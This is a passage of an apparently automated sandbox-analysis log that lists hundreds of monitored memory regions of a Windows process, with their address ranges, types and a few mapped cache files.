"pagefile_0x0000000002880000" filename = "" Region: id = 14389 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14390 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14391 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14392 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14393 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 14394 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 14395 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14396 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14397 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14398 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14399 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14400 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14401 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14402 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14403 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14404 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14405 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14406 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14407 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14408 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14409 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14410 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14411 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14412 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14413 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14414 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14415 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14416 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14417 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14418 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14419 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14420 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14421 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14422 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14423 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14424 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14425 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14426 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14427 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14428 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14429 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14430 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14431 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14432 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14433 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14434 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14435 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14436 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14437 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14438 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14439 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14440 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14441 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14442 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14443 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14444 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14445 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14446 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14447 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14448 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14449 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14450 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14451 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14452 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14453 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14454 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14455 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14456 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14457 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14458 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14459 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14460 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14461 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14462 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14463 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14464 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14465 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14466 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14467 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14468 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14469 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14470 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14471 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14472 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14473 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14474 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14475 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14476 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14477 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14478 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14479 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14480 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14481 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14482 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14483 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14484 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14485 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14486 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14487 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14488 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14489 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14490 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14491 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14492 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14493 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14494 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14495 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14496 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14497 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14498 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14499 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14500 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14501 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14502 start_va = 0xb4f0000 end_va = 0xbeeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4f0000" filename = "" Region: id = 14503 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 14504 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 14505 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14506 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14507 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14508 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14509 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14510 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14511 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14512 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14513 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14514 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14515 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14516 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14517 start_va = 0x2100000 end_va = 0x2103fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 14518 start_va = 0x2490000 end_va = 0x2493fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 14519 start_va = 0x4140000 end_va = 0x4157fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 14520 start_va = 0x2490000 end_va = 0x24a7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 14521 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14522 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14523 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14524 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14525 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14526 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14527 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14528 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14529 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14530 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14531 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14532 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14533 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14534 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14535 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14536 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14537 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14538 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14539 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14540 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14541 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14542 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14543 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14544 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14545 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14546 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14547 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14548 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14549 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14550 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14551 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14552 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14553 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14554 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14555 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14556 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14557 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14558 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14559 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14560 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14561 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14562 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14563 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14564 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14565 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14566 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14567 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14568 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 